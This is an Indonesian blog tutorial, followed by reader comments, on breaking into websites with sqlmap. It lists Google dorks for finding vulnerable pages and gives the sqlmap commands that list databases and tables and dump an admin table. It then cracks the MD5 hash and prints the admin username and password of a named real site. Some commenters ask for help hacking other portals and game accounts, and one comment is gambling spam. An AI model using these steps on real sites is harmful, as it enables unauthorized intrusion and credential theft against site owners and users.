Selamat pagi semuanya , kali ini ane mau bikin tutorial mencari username + password dengan sqlmap di windows.
Sqlmap ini adalah tool khusus untuk mengexploit kerentanan yang bertype sqli injection. sqli injection sendiri adalah teknik penyerangan database dengan perintah perintah tertentu sehingga si penyerang dapat mengetahui isi database sebuah web yang di dalamnya terdapat username dan password admin web.
Alat yang di butuhkan :
1. sqlmap
2. pc sudah terinstall python disini
2. web vuln sqli injection
3. komputer :V
4. segelas semangat untuk memulai semuanya :)
lets mulai :v
1. sqlmap silahkan download di sini download yang zip.
Tools ini berbasis bahasa python jadi untuk menjalankanya silahkan install python terlebih dahulu , untuk tutorialnya disini.
setelah di download silahkan extract . lalu copy kan file nya ke folder c:\python27 (folder python di sesuaikan dengan versi python masing2).
2. web vuln sqli injection
Untuk web vuln silahkan teman teman cari dengan dork :
inurl:berita.php?id=
inurl:index.php?id=
inurl:details.php?id=
inurl:news.php?id=
(untuk dork bisa teman teman cari di google/buat sendiri karena dork sqli ini sangat bervariasi).
ambil salah satu dork lalu coba buka satu satu dan tambahkan tanda kutip satu(') di belakang url.
dan jika terjadi errorr seperti " “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near " atau errorr yang lain berarti web itu vuln sqli.
sebagai pembelajaran di sini saya akan memakai web http://www.pakuanraya.com/m/berita.php?id=136
setelah dapat web yang vuln sekarang mari beraksi :v
3. Masuk cmd kemudian masuk ke direktori sqlmap yang tadi, dengan perintah "cd /python27/sqlmap/" perintah untuk foldernya di sesuaikan dengan nama folder di pc teman teman .
4. Masukan perintah "python sqlmap.py -u target.com --dbs" lalu enter. jika nanti muncul pilihan - pilihan silahkan agan2 pilih yes/tekan enter saja . tunggu sampai muncul nama database nya.
Tuhkan nama nama database nya udah muncul. :)
ket : -u = url target , --dbs = menampilkan databasenya .
ket : -u = url target , --dbs = menampilkan databasenya .
5. Masukan lagi perintah "python sqlmap.py -u target.com -D namadatabase --tables" untuk memunculkan nama nama table dari database yang di pilih . oh iya, yang kita ambil bukan information schema karena db itu ada di setiap web . dan ane belum tau fungsinya :'v . lalu tunggu sampai muncul nama-nama tablenya.
tuh tablenya keliatan :v .
ket : -D = nama database, --tables = tampilkan table dari db
6. Karena kita mau nyari username+password adminya, maka kita pilih table admin_web (untuk nama table admin bisa user,admin,member tergantung yang bikin web). masukan perintah "python sqlmap.py -u target.com -D namadatabase -T admin_web --columns" untuk menampilkan kolom kolom yang terapat dalam tabel admin_web.
muncul lagi tuh kolomnya :v.
-T = nama table , --columns = tampilkan kolom dari table yang di pilih.
6. Setelah muncul kolomnya, saatnya kita mengambil username dan passwordnya dengan perintah "python sqlmap.py -u target.com -D namadatabase -T admin_web -C password,username --dump" untuk password dan username sesuaikan dengan nama kolom target agan.
jika perintah tadi sudah di masukan , maka akan muncul kiran kira gambar sebagai berikut
kalo di bahasa indonesian gini " bro usernamnya udah ada , tapi passwordnya di encrypt/hash md5 mau di decrypt sama worldlist yang ada di sqlmap nggk ?" kira2 gitu lah :v
kita yes/enter aja siapa tahu ada yang nyangkut . :) .
ada beberapa password yang berhasil di hash, sayangnya levelnya bukan admin . :v
karena password adminya belum ke hash mari kita coba gunain website decryt md5 online. disini
tuhkan passwordnya ketemu buat username mulyono :) .
username:mulyono
password: M03--I33
tinnggal nyari login adminya deh :)
sekian tutorial kali ini , tetap panteng blog ini untuk update kedepanya . salam dari nubi.
jejak dulu aja gan wkwkw
ReplyDeletemonggo gan, makasih udah mampir :)
DeletePengen Nyoba tapi nyari target nya susah
ReplyDeletekalo bisa , mending bikin dork sendiri . :)
Deletecara menjalankan sqlmap dari cmd gimana ya?
ReplyDeletesumpah... keren bro...
ReplyDeleteKalog buat nyuri game online bisa ndak kak
ReplyDeleteJangankan nyuri gem onlen, nyuri sempak ama kutang aja bisa kok
Deletebantu gua hack user name dan pasword portal stia nusa min
ReplyDeleteDari android bisa gk gan..?
ReplyDeleteThis comment has been removed by the author.
DeleteHallo pemain setia togel online dapatkan sekarang juga bonus new member 100rb rupiah tanpa syarat ribet dan bonus deposit 5000 rupiah setiap hari untuk anda yang aktif bermain Untuk cara bermain bagi pemula 100% jitu anda bisa kunjungi langsung blog unsurtoto http://www.chicagopropheticvoice.net
ReplyDeletenjir bang cara nyari login adminnya kek mana yak? :v
ReplyDeleteKak bisa bantu sy? password sy terhidden dan lupa, penyebabnya email sama tapi pasword berbeda utk 2 URL. URL pertama dengan email sama terhidden oleh URL kedua dengan email sama
ReplyDelete